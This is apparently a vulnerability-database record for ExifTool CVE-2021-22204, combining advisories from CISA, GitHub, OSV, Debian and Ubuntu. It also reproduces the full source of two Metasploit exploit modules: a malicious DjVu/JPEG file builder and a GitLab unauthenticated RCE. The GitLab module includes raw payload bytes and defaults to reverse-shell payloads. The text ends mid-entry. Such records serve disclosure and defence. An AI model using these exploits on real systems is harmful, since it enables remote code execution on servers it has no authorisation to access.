["CVE-2021-22204"], "modified": "2021-11-17T00:00:00", "id": "CISA-KEV-CVE-2021-22204", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-01-07T00:50:08", "description": "This module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.\n", "cvss3": {}, "published": "2021-05-11T02:02:12", "type": "metasploit", "title": "ExifTool DjVu ANT Perl injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-11T02:11:22", "id": "MSF:EXPLOIT-UNIX-FILEFORMAT-EXIFTOOL_DJVU_ANT_PERL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/unix/fileformat/exiftool_djvu_ant_perl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ExifTool DjVu ANT Perl injection',\n 'Description' => %q{\n This module exploits a Perl injection vulnerability in the DjVu ANT\n parsing code of ExifTool versions 7.44 through 12.23 inclusive. The\n injection is used to execute a shell command using Perl backticks.\n The DjVu image can be embedded in a wrapper image using the\n HasselbladExif EXIF field.\n },\n 'Author' => [\n 'William Bowling', # Vulnerability discovery\n 'Justin Steven' # Metasploit module\n ],\n 'References' => [\n %w[CVE 2021-22204],\n %w[URL https://twitter.com/wcbowling/status/1385803927321415687],\n %w[URL https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031],\n %w[URL https://www.openwall.com/lists/oss-security/2021/05/10/5]\n ],\n 'DisclosureDate' => '2021-05-24',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'DisableNops' => true,\n 'Space' => 2000,\n 'BadChars' => \"\\x22\\x24\\x40\\x60\\x5c\" # \", $, @, ` and \\\n },\n 'Targets' => [\n ['JPEG file', { template: 'msf.jpg' }],\n ['TIFF file', { template: 'msf.tif' }],\n ['DjVu file', { template: 'msf.djvu' }]\n ],\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('FILENAME', [true, 'Output file', 'msf.jpg'])\n ])\n end\n\n def exploit\n p = payload.encoded\n\n buf = djvu_template.sub('echo vulnerable > /dev/tty', p)\n buf[8, 4] = [209 + p.length].pack('L>') # Fix up DJVM length\n buf[174, 4] = [43 + p.length].pack('L>') # Fix up DJVI length\n buf[186, 4] = [31 + p.length].pack('L>') # Fix up ANTa length\n\n if target.name == 'JPEG file'\n jpeg_buf = jpeg_template\n jpeg_buf[86, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = jpeg_buf\n elsif target.name == 'TIFF file'\n tif_buf = tif_template\n tif_buf[206, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = tif_buf\n end\n\n file_create(buf)\n end\n\n def djvu_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.djvu'\n ))\n end\n\n def jpeg_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.jpg'\n ))\n end\n\n def tif_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.tif'\n ))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/fileformat/exiftool_djvu_ant_perl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-14T08:48:25", "description": "This module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8. Exploitation will result in command execution as the git user.\n", "cvss3": {}, "published": "2021-11-02T08:46:51", "type": "metasploit", "title": "GitLab Unauthenticated Remote ExifTool Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-03T17:51:37", "id": "MSF:EXPLOIT-MULTI-HTTP-GITLAB_EXIF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_exif_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated file upload and command\n injection vulnerability in GitLab Community Edition (CE) and\n Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6,\n and 13.8.8.\n\n Exploitation will result in command execution as the git user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'William Bowling', # Vulnerability discovery and CVE-2021-22204 PoC\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-22205' ], # GitLab\n [ 'CVE', '2021-22204' ], # ExifTool\n [ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ],\n [ 'URL', 'https://hackerone.com/reports/1154542' ],\n [ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ],\n [ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ]\n ],\n 'DisclosureDate' => '2021-04-14',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'Payload' => {\n 'Space' => 290,\n 'DisableNops' => true,\n 'BadChars' => '#'\n },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'lwprequest', 'curl', 'printf' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def upload_file(file_data, timeout = 20)\n random_filename = \"#{rand_text_alphanumeric(6..12)}.jpg\"\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n file_data,\n 'image/jpeg',\n 'binary',\n \"form-data; name=\\\"file\\\"; filename=\\\"#{random_filename}\\\"\"\n )\n\n random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12))\n print_status(\"Uploading #{random_filename} to #{random_uri}\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => random_uri,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, timeout)\n end\n\n def check\n # Checks if the instance is a GitLab install by looking for the\n # 'About GitLab' footer or a password redirect. If that's successful\n # a bogus jpg image is uploaded to a bogus URI. The patched versions\n # should never send the bad image to ExifTool, resulting in a 404.\n # The unpatched versions should feed the image to the vulnerable\n # ExifTool, resulting in a 422 error message.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/users/sign_in')\n })\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # handle two cases. First a normal install will respond with HTTP 200.\n # Second, if the root password hasn't been set yet then this will\n # redirect to the password reset page.\n unless (res.code == 200 && res.body.include?('>About GitLab<')) ||\n (res.code == 302 && res.body.include?('/users/password/edit?reset_password_token'))\n return CheckCode::Safe('Not a GitLab web interface')\n end\n\n res = upload_file(rand_text_alphanumeric(6..32))\n unless res\n return CheckCode::Detected('The target did not respond to the upload request.')\n end\n\n case res.code\n when 422\n if res.body.include?('The change you requested was rejected.')\n return CheckCode::Vulnerable('The error response indicates ExifTool was executed.')\n end\n when 404\n if res.body.include?('The page could not be found')\n return CheckCode::Safe('The error response indicates ExifTool was not run.')\n end\n end\n\n return CheckCode::Detected\n end\n\n def execute_command(cmd, _opts = {})\n # printf needs all '\\' to be double escaped due to ExifTool parsing\n if cmd.start_with?('printf ')\n cmd = cmd.gsub('\\\\', '\\\\\\\\\\\\')\n end\n\n # header and trailer are taken from William Bowling's echo_vakzz.jpg from their original h1 disclosure.\n # The 'cmd' variable is sandwiched in a qx## function.\n payload_header = \"AT&TFORM\\x00\\x00\\x03\\xAFDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\"\\\n \"\\x00\\xAC\\xFF\\xFF\\xDE\\xBF\\x99 !\\xC8\\x91N\\xEB\\f\\a\\x1F\\xD2\\xDA\\x88\\xE8k\\xE6D\\x0F,q\\x02\\xEEI\\xD3n\"\\\n \"\\x95\\xBD\\xA2\\xC3\\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\b\\x00\\b\\x18\\x00d\\x00\\x16\\x00IN\"\\\n \"CL\\x00\\x00\\x00\\x0Fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\b\\x00\\b\\x8A\\xE6\\xE1\"\\\n \"\\xB17\\xD9\\x7F*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0F\\xF9\\x9FBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\"\\\n \"\\x03\\aDJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\\"\\\\\\n\\\" . qx#\"\n payload_trailer = \"# . \\\\\\x0a\\\" b \\\") )\" + (' ' * 421)\n\n res = upload_file(payload_header + cmd + payload_trailer, 5)\n\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 422.\n if res && res.code != 422\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n\n print_good('Exploit successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # payload is truncated by exiftool after 290 bytes. Because we need to\n # expand the printf flavor by a potential factor of 2, halve the linemax.\n execute_cmdstager(linemax: 144)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/gitlab_exif_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2023-01-09T05:06:51", "description": "### Impact\n\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads.\n\n### Patches\n\nExifTool has already been patched in version 12.24. exiftool-vendored, which vendors ExifTool, includes this patch in v14.3.0.\n\n### Workarounds\n\nNo.\n\n### References\n\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [exiftool-vendored](https://github.com/photostructure/exiftool-vendored.js)\n\n", "cvss3": {}, "published": "2021-05-04T17:43:52", "type": "github", "title": "Arbitrary code execution in ExifTool", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-22204"], "modified": "2023-01-09T05:04:47", "id": "GHSA-4WHQ-R978-2X68", "href": "https://github.com/advisories/GHSA-4whq-r978-2x68", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-08-10T07:15:54", "description": "\nA vulnerability was discovered in libimage-exiftool-perl, a library and\nprogram to read and write meta information in multimedia files, which\nmay result in execution of arbitrary code if a malformed DjVu file is\nprocessed.\n\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\n\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\n\nFor the detailed security status of libimage-exiftool-perl please refer\nto its security tracker page at:\n<https://security-tracker.debian.org/tracker/libimage-exiftool-perl>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-02T00:00:00", "type": "osv", "title": "libimage-exiftool-perl - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-08-10T07:15:48", "id": "OSV:DSA-4910-1", "href": "https://osv.dev/vulnerability/DSA-4910-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:15:28", "description": "\nA vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\n\nFor the detailed security status of libimage-exiftool-perl please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/libimage-exiftool-perl>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-16T00:00:00", "type": "osv", "title": "libimage-exiftool-perl - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-21T05:53:44", "id": "OSV:DLA-2663-1", "href": "https://osv.dev/vulnerability/DLA-2663-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-08T05:46:49", "description": "### Impact\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads\n\n### Patches\nExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).\n\n### Workarounds\nNo\n\n### References\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [exiftool_vendored.rb](https://github.com/exiftool-rb/exiftool_vendored.rb/issues)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-20T19:33:40", "type": "osv", "title": "ExifTool vulnerable to arbitrary code execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-03-08T05:46:46", "id": "OSV:GHSA-Q95H-CQRV-8JV5", "href": "https://osv.dev/vulnerability/GHSA-q95h-cqrv-8jv5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T21:36:30", "description": "### Impact\n\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads.\n\n### Patches\n\nExifTool has already been patched in version 12.24. exiftool-vendored, which vendors ExifTool, includes this patch in v14.3.0.\n\n### Workarounds\n\nNo.\n\n### References\n\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [exiftool-vendored](https://github.com/photostructure/exiftool-vendored.js)\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T17:43:52", "type": "osv", "title": "Arbitrary code execution in ExifTool", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-10-08T21:20:43", "id": "OSV:GHSA-4WHQ-R978-2X68", "href": "https://osv.dev/vulnerability/GHSA-4whq-r978-2x68", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-03-06T06:07:34", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T18:15:00", "type": "debiancve", "title": "CVE-2021-22204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-04-23T18:15:00", "id": "DEBIANCVE:CVE-2021-22204", "href": "https://security-tracker.debian.org/tracker/CVE-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-27T13:34:17", "description": "Improper neutralization of user data in the DjVu file format in ExifTool\nversions 7.44 and up allows arbitrary code execution when parsing the\nmalicious image\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=987505>\n * <https://bugs.launchpad.net/bugs/1925985>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T00:00:00", "type": "ubuntucve", "title": "CVE-2021-22204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-04-23T00:00:00", "id": "UB:CVE-2021-22204", "href": "https://ubuntu.com/security/CVE-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-03T01:39:42", "description": "This Metasploit module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-12T00:00:00", "type": "zdt", "title": "ExifTool DjVu ANT Perl Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-12T00:00:00", "id": "1337DAY-ID-36236", "href": "https://0day.today/exploit/description/36236", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ExifTool DjVu ANT Perl injection',\n 'Description' => %q{\n This module exploits a Perl injection vulnerability in the DjVu ANT\n parsing code of ExifTool versions 7.44 through 12.23 inclusive. The\n injection is used to execute a shell command using Perl backticks.\n The DjVu image can be embedded in a wrapper image using the\n HasselbladExif EXIF field.\n },\n 'Author' => [\n 'William Bowling', # Vulnerability discovery\n 'Justin Steven' # Metasploit module\n ],\n 'References' => [\n %w[CVE 2021-22204],\n %w[URL https://twitter.com/wcbowling/status/1385803927321415687],\n %w[URL https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031],\n %w[URL https://www.openwall.com/lists/oss-security/2021/05/10/5]\n ],\n 'DisclosureDate' => '2021-05-24',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'DisableNops' => true,\n 'Space' => 2000,\n 'BadChars' => \"\\x22\\x24\\x40\\x60\\x5c\" # \", $, @, ` and \\\n },\n 'Targets' => [\n ['JPEG file', { template: 'msf.jpg' }],\n ['TIFF file', { template: 'msf.tif' }],\n ['DjVu file', { template: 'msf.djvu' }]\n ],\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('FILENAME', [true, 'Output file', 'msf.jpg'])\n ])\n end\n\n def exploit\n p = payload.encoded\n\n buf = djvu_template.sub('echo vulnerable > /dev/tty', p)\n buf[8, 4] = [209 + p.length].pack('L>') # Fix up DJVM length\n buf[174, 4] = [43 + p.length].pack('L>') # Fix up DJVI length\n buf[186, 4] = [31 + p.length].pack('L>') # Fix up ANTa length\n\n if target.name == 'JPEG file'\n jpeg_buf = jpeg_template\n jpeg_buf[86, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = jpeg_buf\n elsif target.name == 'TIFF file'\n tif_buf = tif_template\n tif_buf[206, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = tif_buf\n end\n\n file_create(buf)\n end\n\n def djvu_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.djvu'\n ))\n end\n\n def jpeg_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.jpg'\n ))\n end\n\n def tif_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.tif'\n ))\n end\nend\n", "sourceHref": "https://0day.today/exploit/36236", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T09:35:29", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "zdt", "title": "ExifTool 12.23 - Arbitrary Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-12T00:00:00", "id": "1337DAY-ID-37713", "href": "https://0day.today/exploit/description/37713", "sourceData": "# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution\n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)\n# Vendor Homepage: https://exiftool.org/\n# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip\n# Version: 7.44-12.23\n# Tested on: ExifTool 12.23 (Debian)\n# CVE: CVE-2021-22204\n# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204\n# Description: Improper neutralization of user data in the 